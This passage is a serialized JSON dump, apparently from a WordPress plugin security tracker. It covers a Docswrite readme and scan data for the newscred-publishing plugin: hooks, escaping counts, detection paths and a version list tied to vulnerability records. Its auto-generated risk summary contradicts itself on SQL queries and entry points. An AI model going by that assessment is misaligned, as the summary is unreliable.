Docswrite.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Newspack SEO Support:\u003C\u002Fstrong> Update Newspack SEO fields for posts created by Docswrite.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>📦 Installation\u003C\u002Fh3>\n\u003Col>\n\u003Cli>\n\u003Cp>Activate the plugin from the Plugins menu in your WordPress admin panel.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Have an account at \u003Ca href=\"https:\u002F\u002Fdocswrite.com\u002Faccounts\u002Fsignup\" rel=\"nofollow ugc\">Docswrite\u003C\u002Fa>.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>🛠️ How Does it Work?\u003C\u002Fh3>\n\u003Col>\n\u003Cli>\n\u003Cp>After Docswrite is activated, click on “Connect” and you will be redirected to Docswrite.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>If you have an account with Docswrite, your website will be automatically registered. If not, you will be redirected to the signup page.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Once connected, go to the \u003Ca href=\"https:\u002F\u002Fdocswrite.com\u002Fdashboard\" rel=\"nofollow ugc\">Docswrite dashboard\u003C\u002Fa> and start your publishing journey.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Happy publishing!\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>💬 Support\u003C\u002Fh3>\n\u003Cp>For support or inquiries, please visit \u003Ca href=\"https:\u002F\u002Fhelp.docswrite.com\u002Fsupport\" rel=\"nofollow ugc\">Docswrite Support\u003C\u002Fa> or contact us at team@docswrite.com\u003C\u002Fp>\n\u003Ch3>How it works\u003C\u002Fh3>\n\u003Col>\n\u003Cli>After installation and activation of the plugin, this is the screen you see. The Website ID represents a secret that will be used to connect with Docswrite\u003C\u002Fli>\n\u003Cli>After clicking on ‘Connect’ you will be redirected to Docswrite – you need to be logged in to Docswrite\u003C\u002Fli>\n\u003Cli>If you don’t have an account with Docswrite, you will be redirected to the sign up page\u003C\u002Fli>\n\u003Cli>Your site will be added to Docswrite dashboard\u003C\u002Fli>\n\u003Cli>You are successfully connected \u003C\u002Fli>\n\u003Cli>Now, you can publish content using Docswrite ✨\u003C\u002Fli>\n\u003C\u002Fol>\n","Effortlessly publish Google Docs to WordPress, preserving formatting and structure for a streamlined content workflow",2615,4,"2025-10-12T16:16:00.000Z","3.5.0","5.3",[75,146,147,148,77],"automated-publishing","content-management","google-docs","https:\u002F\u002Fdocswrite.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdocswrite.zip",{"attackSurface":152,"codeSignals":196,"taintFlows":209,"riskAssessment":210,"analyzedAt":222},{"hooks":153,"ajaxHandlers":192,"restRoutes":193,"shortcodes":194,"cronEvents":195,"entryPointCount":13,"unprotectedCount":13},[154,160,165,169,172,175,179,183,187],{"type":155,"name":156,"callback":157,"file":158,"line":159},"filter","xmlrpc_methods","nc_xmlrpc_methods","newscred.php",14,{"type":161,"name":162,"callback":163,"file":158,"line":164},"action","init","nc_register_preview_status",21,{"type":161,"name":166,"callback":167,"file":158,"line":168},"wp_head","js_tracker_inserter",23,{"type":161,"name":166,"callback":170,"file":158,"line":171},"website_widget_js_inserter",24,{"type":161,"name":166,"callback":173,"file":158,"line":174},"nc_meta_tags",25,{"type":155,"name":176,"callback":177,"file":158,"line":178},"posts_results","nc_check_draft_query",27,{"type":155,"name":180,"callback":181,"priority":13,"file":158,"line":182},"user_has_cap","nc_allow_protected_meta_edit",29,{"type":161,"name":184,"callback":185,"file":158,"line":186},"parse_query","closure",34,{"type":155,"name":188,"callback":189,"priority":190,"file":191,"line":47},"xmlrpc_prepare_post","nc_add_yoast_installation_status",10,"yoast.php",[],[],[],[],{"dangerousFunctions":197,"sqlUsage":198,"outputEscaping":200,"fileOperations":25,"externalRequests":13,"nonceChecks":13,"capabilityChecks":25,"bundledLibraries":208},[],{"prepared":13,"raw":13,"locations":199},[],{"escaped":47,"rawEcho":201,"locations":202},2,[203,206],{"file":158,"line":204,"context":205},232,"raw output",{"file":158,"line":207,"context":205},239,[],[],{"summary":211,"deductions":212},"The newscred-publishing plugin version 0.0.31 exhibits a generally strong security posture based on the provided static analysis and vulnerability history.  The absence of any known CVEs, critical taint flows, dangerous functions, or direct SQL queries is highly positive.  The plugin also demonstrates good practices with 100% of SQL queries using prepared statements and at least one capability check.  However, there are areas for improvement. The output escaping is only 60% properly handled, indicating a potential risk of cross-site scripting (XSS) vulnerabilities if user-supplied data is rendered without adequate sanitization.  Furthermore, the lack of any detected nonce checks or clear permission callbacks on its (albeit zero) entry points suggests a potential blind spot in how these mechanisms are implemented or assessed. The plugin's minimal attack surface (0 entry points) is a significant strength, but the lack of specific detail on how the single file operation and capability check are secured leaves room for concern.",[213,216,218,220],{"reason":214,"points":215},"Output escaping only 60% proper",5,{"reason":217,"points":215},"No nonce checks detected",{"reason":219,"points":215},"No permission callbacks on REST API",{"reason":221,"points":47},"File operations without clear security context","2026-04-16T11:16:28.141Z",{"wat":224,"direct":231},{"assetPaths":225,"generatorPatterns":228,"scriptPaths":229,"versionParams":230},[226,227],"\u002Fwp-content\u002Fplugins\u002Fnewscred-publishing\u002Fnewscred-publishing.js","\u002Fwp-content\u002Fplugins\u002Fnewscred-publishing\u002Feditor.js",[],[226,227],[],{"cssClasses":232,"htmlComments":233,"htmlAttributes":234,"restEndpoints":236,"jsGlobals":237,"shortcodeOutput":240},[],[],[235],"nc-preview-token",[],[238,239],"nc_preview_token","nc_preview_link",[],{"error":242,"url":243,"statusCode":244,"statusMessage":245,"message":245},true,"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fnewscred-publishing\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":247,"versions":248},28,[249,256,264,272,280,288,296,304,312,320,328,336,344,352,360,368,376,384,392,400,408,416,424,432,440,448,456,464],{"version":6,"download_url":250,"svn_tag_url":251,"released_at":35,"has_diff":46,"diff_files_changed":252,"diff_lines":35,"trac_diff_url":253,"vulnerabilities":254,"is_current":242},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.31.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.31\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.30&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.31",[255],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":257,"download_url":258,"svn_tag_url":259,"released_at":35,"has_diff":46,"diff_files_changed":260,"diff_lines":35,"trac_diff_url":261,"vulnerabilities":262,"is_current":46},"0.0.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.30.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.30\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.29&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.30",[263],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":265,"download_url":266,"svn_tag_url":267,"released_at":35,"has_diff":46,"diff_files_changed":268,"diff_lines":35,"trac_diff_url":269,"vulnerabilities":270,"is_current":46},"0.0.29","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.29.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.29\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.28&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.29",[271],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":273,"download_url":274,"svn_tag_url":275,"released_at":35,"has_diff":46,"diff_files_changed":276,"diff_lines":35,"trac_diff_url":277,"vulnerabilities":278,"is_current":46},"0.0.28","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.28.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.28\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.27&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.28",[279],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":281,"download_url":282,"svn_tag_url":283,"released_at":35,"has_diff":46,"diff_files_changed":284,"diff_lines":35,"trac_diff_url":285,"vulnerabilities":286,"is_current":46},"0.0.27","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.27.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.27\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.26&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.27",[287],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":289,"download_url":290,"svn_tag_url":291,"released_at":35,"has_diff":46,"diff_files_changed":292,"diff_lines":35,"trac_diff_url":293,"vulnerabilities":294,"is_current":46},"0.0.26","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.26.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.26\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.25&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.26",[295],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":297,"download_url":298,"svn_tag_url":299,"released_at":35,"has_diff":46,"diff_files_changed":300,"diff_lines":35,"trac_diff_url":301,"vulnerabilities":302,"is_current":46},"0.0.25","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.25.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.25\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.24&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.25",[303],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":305,"download_url":306,"svn_tag_url":307,"released_at":35,"has_diff":46,"diff_files_changed":308,"diff_lines":35,"trac_diff_url":309,"vulnerabilities":310,"is_current":46},"0.0.24","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.24.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.24\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.23&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.24",[311],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":313,"download_url":314,"svn_tag_url":315,"released_at":35,"has_diff":46,"diff_files_changed":316,"diff_lines":35,"trac_diff_url":317,"vulnerabilities":318,"is_current":46},"0.0.23","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.23.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.23\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.22&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.23",[319],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":321,"download_url":322,"svn_tag_url":323,"released_at":35,"has_diff":46,"diff_files_changed":324,"diff_lines":35,"trac_diff_url":325,"vulnerabilities":326,"is_current":46},"0.0.22","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.22.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.22\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.21&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.22",[327],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":329,"download_url":330,"svn_tag_url":331,"released_at":35,"has_diff":46,"diff_files_changed":332,"diff_lines":35,"trac_diff_url":333,"vulnerabilities":334,"is_current":46},"0.0.21","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.21.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.21\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.20&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.21",[335],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":337,"download_url":338,"svn_tag_url":339,"released_at":35,"has_diff":46,"diff_files_changed":340,"diff_lines":35,"trac_diff_url":341,"vulnerabilities":342,"is_current":46},"0.0.20","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.20.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.20\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.19&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.20",[343],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":345,"download_url":346,"svn_tag_url":347,"released_at":35,"has_diff":46,"diff_files_changed":348,"diff_lines":35,"trac_diff_url":349,"vulnerabilities":350,"is_current":46},"0.0.19","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.19.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.19\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.18&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.19",[351],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":353,"download_url":354,"svn_tag_url":355,"released_at":35,"has_diff":46,"diff_files_changed":356,"diff_lines":35,"trac_diff_url":357,"vulnerabilities":358,"is_current":46},"0.0.18","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.18.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.18\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.17&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.18",[359],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":361,"download_url":362,"svn_tag_url":363,"released_at":35,"has_diff":46,"diff_files_changed":364,"diff_lines":35,"trac_diff_url":365,"vulnerabilities":366,"is_current":46},"0.0.17","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.17.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.17\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.16&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.17",[367],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":369,"download_url":370,"svn_tag_url":371,"released_at":35,"has_diff":46,"diff_files_changed":372,"diff_lines":35,"trac_diff_url":373,"vulnerabilities":374,"is_current":46},"0.0.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.16.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.16\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.15&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.16",[375],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":377,"download_url":378,"svn_tag_url":379,"released_at":35,"has_diff":46,"diff_files_changed":380,"diff_lines":35,"trac_diff_url":381,"vulnerabilities":382,"is_current":46},"0.0.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.15.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.15\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.14&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.15",[383],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":385,"download_url":386,"svn_tag_url":387,"released_at":35,"has_diff":46,"diff_files_changed":388,"diff_lines":35,"trac_diff_url":389,"vulnerabilities":390,"is_current":46},"0.0.14","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.14.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.14\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.13&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.14",[391],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":393,"download_url":394,"svn_tag_url":395,"released_at":35,"has_diff":46,"diff_files_changed":396,"diff_lines":35,"trac_diff_url":397,"vulnerabilities":398,"is_current":46},"0.0.13","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.13.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.13\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.12&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.13",[399],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":401,"download_url":402,"svn_tag_url":403,"released_at":35,"has_diff":46,"diff_files_changed":404,"diff_lines":35,"trac_diff_url":405,"vulnerabilities":406,"is_current":46},"0.0.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.12.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.12\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.11&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.12",[407],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":409,"download_url":410,"svn_tag_url":411,"released_at":35,"has_diff":46,"diff_files_changed":412,"diff_lines":35,"trac_diff_url":413,"vulnerabilities":414,"is_current":46},"0.0.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.11.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.11\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.10&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.11",[415],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":417,"download_url":418,"svn_tag_url":419,"released_at":35,"has_diff":46,"diff_files_changed":420,"diff_lines":35,"trac_diff_url":421,"vulnerabilities":422,"is_current":46},"0.0.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.10.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.10\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.9&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.10",[423],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":425,"download_url":426,"svn_tag_url":427,"released_at":35,"has_diff":46,"diff_files_changed":428,"diff_lines":35,"trac_diff_url":429,"vulnerabilities":430,"is_current":46},"0.0.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.9\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.8&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.9",[431],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":433,"download_url":434,"svn_tag_url":435,"released_at":35,"has_diff":46,"diff_files_changed":436,"diff_lines":35,"trac_diff_url":437,"vulnerabilities":438,"is_current":46},"0.0.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.8.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.8\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.7&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.8",[439],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":441,"download_url":442,"svn_tag_url":443,"released_at":35,"has_diff":46,"diff_files_changed":444,"diff_lines":35,"trac_diff_url":445,"vulnerabilities":446,"is_current":46},"0.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.7.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.7\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.6&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.7",[447],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":449,"download_url":450,"svn_tag_url":451,"released_at":35,"has_diff":46,"diff_files_changed":452,"diff_lines":35,"trac_diff_url":453,"vulnerabilities":454,"is_current":46},"0.0.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.5&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.6",[455],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":457,"download_url":458,"svn_tag_url":459,"released_at":35,"has_diff":46,"diff_files_changed":460,"diff_lines":35,"trac_diff_url":461,"vulnerabilities":462,"is_current":46},"0.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fnewscred-publishing%2Ftags%2F0.0.3&new_path=%2Fnewscred-publishing%2Ftags%2F0.0.5",[463],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":465,"download_url":466,"svn_tag_url":467,"released_at":35,"has_diff":46,"diff_files_changed":468,"diff_lines":35,"trac_diff_url":35,"vulnerabilities":469,"is_current":46},"0.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnewscred-publishing.0.0.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fnewscred-publishing\u002Ftags\u002F0.0.3\u002F",[],[470],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35}]